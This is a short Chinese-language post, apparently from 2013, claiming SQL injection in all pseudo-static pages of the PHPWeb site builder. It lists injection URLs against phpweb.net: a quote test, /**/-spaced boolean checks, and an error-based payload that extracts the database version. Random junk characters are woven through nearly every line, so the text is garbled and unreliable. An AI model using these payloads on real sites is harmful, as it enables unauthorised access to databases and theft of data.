phpweb所有的整站程序伪静态页面都存在sql注入
7 |) S) {! x. }3 }* \. p* K/ x+ m
. h# P1 ^ c( j' `. p主站:http://phpweb.net/: [+ Z7 |* w3 Z( @ }
加’检测:
# n! C4 C6 q, J/ y3 L. k) L
& Y; o8 B2 t/ y4 ~3 \http://www.phpweb.net/down/html/?772′.html# ~, q6 y# \% \4 m, [& \; Y
# J0 e; U: P- a出错/ a& k$ a7 s; b q+ d
存在注入。
6 ~5 o1 H, e8 x; R& l( V- C不能用空格,只能用/*罗
9 a: K+ b; D( m: I2 t- Jhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
# \2 D: h) B$ x+ ~ , x/ @- q- K) z
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 b. g' e! {: v4 e
爆数据库版本:7 f( M: o3 Q' z; o% u
& x. U+ o4 L0 U) u) p
?# w5 f0 i' _/ X2 |& f2 o$ J" W5 e
1
?: |: }2 p3 R# Z+ chttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
% e* F2 K; r) K更新日期: 2013-01-03 13:39:50 $ \* U1 y* r P% X [, I* i- S& i1 k
|